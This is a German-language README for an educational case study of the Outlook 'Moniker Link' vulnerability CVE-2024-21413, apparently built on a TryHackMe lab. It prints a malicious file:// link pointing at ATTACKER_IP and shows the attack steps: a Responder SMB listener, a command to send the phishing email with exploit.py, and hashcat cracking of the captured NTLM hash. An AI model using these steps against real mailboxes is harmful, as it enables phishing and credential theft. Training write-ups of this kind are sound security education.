
Eine Fallstudie zu CVE-2024-21413. Verwendet als Parameter den Raum TryHackMe Moniker Link (CVE-2024-21413). Es wurden Bearbeitungen mit claude code am Exploit vorgenommen.
⚠️ Rechtlicher Hinweis: Dieses Repository dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Alle Demonstrationen wurden in kontrollierten und isolierten Umgebungen durchgeführt. Die Nutzung dieser Techniken gegen Systeme ohne ausdrückliche Genehmigung ist illegal und unethisch.
| Feld | Detail |
|---|---|
| CVE | CVE-2024-21413 |
| Veröffentlichung | 13. Februar 2024 (Patch Tuesday) |
| CVSS Score | 9.8 (Kritisch) |
| Produkt | Microsoft Outlook |
| Typ | RCE + Credential Leak (NTLM Hash) |
| Vektor | Netzwerk / E-Mail (ohne vorherige Authentifizierung) |
| Interaktion | Benutzerinteraktion erforderlich (Klicken auf den Link) |
| Spitzname | Moniker Link |
CVE-2024-21413 ist eine kritische Schwachstelle in Microsoft Outlook, die es einem Angreifer ermöglicht:
Der Name „Moniker Link" leitet sich von der Ausnutzung von Component Object Model (COM) Monikern ab – einem Windows-Mechanismus zum Referenzieren von Objekten per Zeichenfolge – um die Schutzmechanismen von Outlook gegen file://-Links zu umgehen.
Normalerweise blockiert Outlook file://-Links, die auf Netzwerkressourcen verweisen, und zeigt eine Sicherheitswarnung (Protected View) an. Der Fehler liegt in der Art und Weise, wie Outlook URLs verarbeitet, die das Zeichen ! enthalten – ein Trennzeichen für Moniker.
Ein bösartiger Link im Format:
file:///\\ATTACKER_IP\share\!something
Das Zeichen ! bewirkt, dass der Parser von Outlook die URL als Referenz auf einen COM-Moniker interpretiert und dabei die normalen Sicherheitsprüfungen umgeht. Das Ergebnis:
Angreifer sendet E-Mail → Opfer klickt auf Link → Outlook verarbeitet URL mit "!"
→ Umgehung der Protected View → Automatische SMB-Verbindung → NTLM-Hash erfasst
Um diese Fallstudie sicher nachzustellen:
| Rechner | Betriebssystem | Rolle |
|---|---|---|
| Angreifer | Kali Linux | SMB-Listener + Exploit |
| Ziel | Windows 10/11 mit anfälligem Outlook | Opfer |
Wichtig: Verwenden Sie ein isoliertes Netzwerk (NAT oder Host-Only in VirtualBox/VMware). Führen Sie dies niemals in realen Netzwerken aus.
# Responder – SMB/HTTP-Listener zum Erfassen von Hashes
sudo apt install responder
# Python 3 – zum Ausführen des Exploits
python3 --version
# Verbindung zwischen den Rechnern prüfen
ping <ZIEL_IP>
ip a | grep inet
# Notieren Sie die IP des Interfaces, das mit dem Ziel kommuniziert (z.B. 192.168.56.10)
Responder erstellt einen gefälschten SMB-Server, der NTLM-Authentifizierungs-Hashes erfasst.
sudo responder -I eth0 -v
# Ersetzen Sie eth0 durch Ihr Netzwerk-Interface
Erwartete Ausgabe:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-OPFER\benutzer
[SMB] NTLMv2-SSP Hash : benutzer::DESKTOP-OPFER:...
python3 exploit.py \
--sender [email protected] \
--recipient [email protected] \
--server <EMAIL_SERVER_IP> \
--attacker-ip 192.168.56.10
Wenn das Opfer die E-Mail öffnet und auf den Link klickt, erfasst Responder automatisch den NTLM-Hash. Dieser Hash kann:
hashcat -m 5600 hash.txt wordlist.txt
Siehe die Datei exploit.py für das vollständige, kommentierte Skript.
Siehe die Datei diagrama-ataque.html für eine interaktive Visualisierung des vollständigen Angriffsablaufs.
Siehe die Datei MITIGACAO.md für den vollständigen Leitfaden zu Abschwächung und Verteidigung.
Siehe die Datei CVE-BREAKDOWN.md für die detaillierte technische Analyse der Schwachstelle.
Fallstudie entwickelt als Teil des praktischen Trainings in offensiver Sicherheit über TryHackMe.
Dieses Projekt folgt den Prinzipien von Responsible Disclosure und Ethical Hacking. Alle hier enthaltenen Inhalte dienen der Bildung und der Verbesserung der Sicherheitslage.